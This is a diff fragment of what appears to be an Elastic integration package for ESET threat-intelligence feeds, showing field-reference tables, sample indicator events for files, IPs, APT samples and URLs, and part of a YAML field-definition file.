"type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-files" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.", + "file": { + "hash": { + "md5": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha1": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-19T02:00:38.000Z", + "modified_at": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } +} +``` + +### IP + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.port | Identifies a threat indicator as a port number (irrespective of direction). | long | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `ip` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:20:06.000Z", + "agent": { + "ephemeral_id": "013ad9c0-d817-4490-a524-0b3f275d2f1a", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.ip", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:20:06.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:22:22.857Z", + "dataset": "ti_eset.ip", + "ingested": "2024-03-27T14:22:34Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:20:06.000Z\",\"description\":\"Web services scanning and attacks\",\"id\":\"indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:20:06.000Z\",\"name\":\"5.2.75.227\",\"pattern\":\"[ipv4-addr:value='5.2.75.227']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:20:06Z\",\"valid_until\":\"2023-10-21T02:20:06Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-ip" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "5.2.75.227", + "last_seen": "2023-10-19T02:20:06.000Z", + "modified_at": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } +} +``` + +### APT + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.category | Event category as defined by MISP. | keyword | +| eset.id | The UID of the event object. | keyword | +| eset.meta_category | Event sub-category as defined by MISP. | keyword | +| eset.name | Human readable name describing the event. | keyword | +| eset.type | Type of the event. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.email.address | Identifies a threat indicator as an email address (irrespective of direction). | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.file.name | Name of the file including the extension, without the directory. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | +| threat.indicator.url.path | Path of the request, such as "/search". | wildcard | +| threat.indicator.url.port | Port of the request, such as 443. | long | +| threat.indicator.url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| threat.indicator.x509.issuer.common_name | List of common name (CN) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.country | List of country \(C) codes | keyword | +| threat.indicator.x509.issuer.distinguished_name | Distinguished name (DN) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.locality | List of locality names (L) | keyword | +| threat.indicator.x509.issuer.organization | List of organizations (O) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.organizational_unit | List of organizational units (OU) of issuing certificate authority. | keyword | +| threat.indicator.x509.issuer.state_or_province | List of state or province names (ST, S, or P) | keyword | +| threat.indicator.x509.not_after | Time at which the certificate is no longer considered valid. | date | +| threat.indicator.x509.not_before | Time at which the certificate is first considered valid. | date | +| threat.indicator.x509.serial_number | Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. | keyword | +| threat.indicator.x509.signature_algorithm | Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. | keyword | +| threat.indicator.x509.subject.common_name | List of common names (CN) of subject. | keyword | +| threat.indicator.x509.subject.country | List of country \(C) code | keyword | +| threat.indicator.x509.subject.distinguished_name | Distinguished name (DN) of the certificate subject entity. | keyword | +| threat.indicator.x509.subject.locality | List of locality names (L) | keyword | +| threat.indicator.x509.subject.organization | List of organizations (O) of subject. | keyword | +| threat.indicator.x509.subject.organizational_unit | List of organizational units (OU) of subject. | keyword | +| threat.indicator.x509.subject.state_or_province | List of state or province names (ST, S, or P) | keyword | +| threat.indicator.x509.version_number | Version of x509 format. | keyword | + + +An example event for `apt` looks as following: + +```json +{ + "@timestamp": "2023-09-29T08:48:42.000Z", + "agent": { + "ephemeral_id": "aca3c3ca-0233-4da9-aa4d-67883702e60b", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.apt", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:42.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:17:00.528Z", + "dataset": "ti_eset.apt", + "ingested": "2024-03-27T14:17:10Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-09-29T08:48:42.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"file\"}],\"labels\":[\"misp:name=\\\"file\\\"\",\"misp:meta-category=\\\"file\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2023-09-29T08:48:42.000Z\",\"pattern\":\"[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-09-26T07:00:04Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-apt" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7196b26572d2c357a17599b9a0d71d33", + "sha1": "a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0", + "sha256": "6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e" + }, + "name": "KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3" + }, + "last_seen": "2023-09-29T08:48:42.000Z", + "modified_at": "2023-09-29T08:48:42.000Z", + "provider": "eset", + "type": "file" + } + } +} +``` + +### URL + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. | keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. | match_only_text | + + +An example event for `url` looks as following: + +```json +{ + "@timestamp": "2023-10-19T02:00:13.000Z", + "agent": { + "ephemeral_id": "47910f1c-df41-4011-adb3-74b1ad882384", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.url", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--8986619a-150b-453c-aaa8-bfe8694d05cc", + "labels": [ + "benign" + ], + "valid_until": "2023-10-21T02:00:13.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:23:28.010Z", + "dataset": "ti_eset.url", + "ingested": "2024-03-27T14:23:40Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:13.000Z\",\"description\":\"Host actively distributes high-severity threat in the form of executable code.\",\"id\":\"indicator--8986619a-150b-453c-aaa8-bfe8694d05cc\",\"labels\":[\"benign\"],\"modified\":\"2023-10-19T02:00:13.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:13Z\",\"valid_until\":\"2023-10-21T02:00:13Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-url" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-19T02:00:13.000Z", + "modified_at": "2023-10-19T02:00:13.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://example.com/some/path" + } + } + } +} +``` \ No newline at end of file diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 